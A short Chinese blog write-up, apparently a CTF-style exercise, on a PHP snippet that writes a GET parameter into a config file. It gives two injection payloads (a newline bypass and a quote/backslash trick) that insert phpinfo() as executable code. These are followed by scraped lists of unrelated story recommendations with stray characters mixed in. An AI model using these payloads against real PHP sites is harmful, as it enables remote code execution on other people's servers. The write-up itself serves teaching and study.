一道經(jīng)典的配置文件寫(xiě)入問(wèn)題

上碼

<?php
$str = addslashes($_GET['option']);
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('xxxxx/option.php', $file);
?>

法一:

1. 第一步：?option=aaa';%0aphpinfo();//

   
   
   第一步

2.第二步： option=aaa

第二步

原理：正則表達(dá)式中 .可以匹配除了換行符之外的所有字符览露，所以人工添加換行符后，后面一個(gè)但因后就匹配到前面的那個(gè)引號(hào)于是phpinfo();得以獨(dú)立存在

法二:?option=';phpinfo();//

法二

原理: '會(huì)讓addslashes()在前面加一個(gè)反斜線,兩個(gè)反斜線轉(zhuǎn)譯成一個(gè)反斜線23333

• 人面猴

  序言：七十年代末甲捏，一起剝皮案震驚了整個(gè)濱河市充甚，隨后出現(xiàn)的幾起案子以政，更是在濱河造成了極大的恐慌，老刑警劉巖伴找，帶你破解...

  沈念sama閱讀 218,546評(píng)論 6贊 507
• 死咒

  序言：濱河連續(xù)發(fā)生了三起死亡事件盈蛮，死亡現(xiàn)場(chǎng)離奇詭異，居然都是意外死亡技矮，警方通過(guò)查閱死者的電腦和手機(jī)抖誉，發(fā)現(xiàn)死者居然都...

  沈念sama閱讀 93,224評(píng)論 3贊 395
• 救了他兩次的神仙讓他今天三更去死

  文/潘曉璐 我一進(jìn)店門，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)衰倦，“玉大人寸五，你說(shuō)我怎么就攤上這事」⒈遥” “怎么了梳杏？”我有些...

  開(kāi)封第一講書(shū)人閱讀 164,911評(píng)論 0贊 354
• 道士緝兇錄：失蹤的賣姜人

  文/不壞的土叔 我叫張陵，是天一觀的道長(zhǎng)淹接。 經(jīng)常有香客問(wèn)我十性，道長(zhǎng)，這世上最難降的妖魔是什么塑悼？ 我笑而不...

  開(kāi)封第一講書(shū)人閱讀 58,737評(píng)論 1贊 294
• ?港島之戀（遺憾婚禮）

  正文 為了忘掉前任劲适，我火速辦了婚禮，結(jié)果婚禮上厢蒜，老公的妹妹穿的比我還像新娘霞势。我一直安慰自己，他們只是感情好斑鸦，可當(dāng)我...

  茶點(diǎn)故事閱讀 67,753評(píng)論 6贊 392
• 惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的

  文/花漫 我一把揭開(kāi)白布愕贡。 她就那樣靜靜地躺著，像睡著了一般巷屿。 火紅的嫁衣襯著肌膚如雪固以。 梳的紋絲不亂的頭發(fā)上，一...

  開(kāi)封第一講書(shū)人閱讀 51,598評(píng)論 1贊 305
• 城市分裂傳說(shuō)

  那天，我揣著相機(jī)與錄音憨琳，去河邊找鬼诫钓。 笑死，一個(gè)胖子當(dāng)著我的面吹牛篙螟，可吹牛的內(nèi)容都是我干的菌湃。 我是一名探鬼主播，決...

  沈念sama閱讀 40,338評(píng)論 3贊 418
• 雙鴛鴦連環(huán)套：你想象不到人心有多黑

  文/蒼蘭香墨 我猛地睜開(kāi)眼遍略，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼惧所！你這毒婦竟也來(lái)了？” 一聲冷哼從身側(cè)響起墅冷，我...

  開(kāi)封第一講書(shū)人閱讀 39,249評(píng)論 0贊 276
• 萬(wàn)榮殺人案實(shí)錄

  序言：老撾萬(wàn)榮一對(duì)情侶失蹤，失蹤者是張志新（化名）和其女友劉穎或油，沒(méi)想到半個(gè)月后寞忿，有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體，經(jīng)...

  沈念sama閱讀 45,696評(píng)論 1贊 314
• ?護(hù)林員之死

  正文 獨(dú)居荒郊野嶺守林人離奇死亡顶岸，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...

  茶點(diǎn)故事閱讀 37,888評(píng)論 3贊 336
• ?白月光啟示錄

  正文 我和宋清朗相戀三年腔彰，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片辖佣。...

  茶點(diǎn)故事閱讀 40,013評(píng)論 1贊 348
• 活死人

  序言：一個(gè)原本活蹦亂跳的男人離奇死亡霹抛，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出卷谈，到底是詐尸還是另有隱情杯拐，我是刑警寧澤，帶...

  沈念sama閱讀 35,731評(píng)論 5贊 346
• ?日本核電站爆炸內(nèi)幕

  正文 年R本政府宣布世蔗，位于F島的核電站端逼，受9級(jí)特大地震影響，放射性物質(zhì)發(fā)生泄漏污淋。R本人自食惡果不足惜顶滩，卻給世界環(huán)境...

  茶點(diǎn)故事閱讀 41,348評(píng)論 3贊 330
• 男人毒藥：我在死后第九天來(lái)索命

  文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望寸爆。 院中可真熱鬧礁鲁，春花似錦、人聲如沸赁豆。這莊子的主人今日做“春日...

  開(kāi)封第一講書(shū)人閱讀 31,929評(píng)論 0贊 22
• 一樁弒父案，背后竟有這般陰謀

  文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)魔种。三九已至着憨，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間务嫡，已是汗流浹背甲抖。 一陣腳步聲響...

  開(kāi)封第一講書(shū)人閱讀 33,048評(píng)論 1贊 270
• 情欲美人皮

  我被黑心中介騙來(lái)泰國(guó)打工漆改， 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留，地道東北人准谚。 一個(gè)月前我還...

  沈念sama閱讀 48,203評(píng)論 3贊 370
• 代替公主和親

  正文 我出身青樓挫剑，卻偏偏與公主長(zhǎng)得像，于是被迫代替她去往敵國(guó)和親柱衔。 傳聞我的和親對(duì)象是個(gè)殘疾皇子樊破，可洞房花燭夜當(dāng)晚...

  茶點(diǎn)故事閱讀 44,960評(píng)論 2贊 355

推薦閱讀更多精彩內(nèi)容

• Perl學(xué)習(xí)筆記9——正則表達(dá)式（上）

  正則表達(dá)式簡(jiǎn)介 Perl最重要的一大特色就是對(duì)正則表達(dá)式的強(qiáng)力支持，這些支持提供了強(qiáng)大且靈活的字符串處理能力唆铐。正則...

  櫻雨樓閱讀 987評(píng)論 0贊 1
• 電子商務(wù)網(wǎng)站開(kāi)發(fā)與建設(shè)

  概要 64學(xué)時(shí) 3.5學(xué)分 章節(jié)安排 電子商務(wù)網(wǎng)站概況 HTML5+CSS3 JavaScript Node 電子...

  阿啊阿吖丁閱讀 9,208評(píng)論 0贊 3
• Python中的正則表達(dá)式(re)

  Python中的正則表達(dá)式(re) import rere.match #從開(kāi)始位置開(kāi)始匹配哲戚，如果開(kāi)頭沒(méi)有則無(wú)re...

  BigJeffWang閱讀 7,082評(píng)論 0贊 99
• bash

  官網(wǎng) 中文版本 好的網(wǎng)站 Content-type: text/htmlBASH Section: User ...

  不排版閱讀 4,383評(píng)論 0贊 5
• 看電影

  耶，今天真的太棒了艾岂！爸爸給我看了一部超級(jí)震撼的電影顺少，它的名字叫獨(dú)立日，是講述外星人侵略地球的王浴，主角是一個(gè)物理學(xué)家和...

  蔡芮浩和蔡芮溪閱讀 132評(píng)論 0贊 1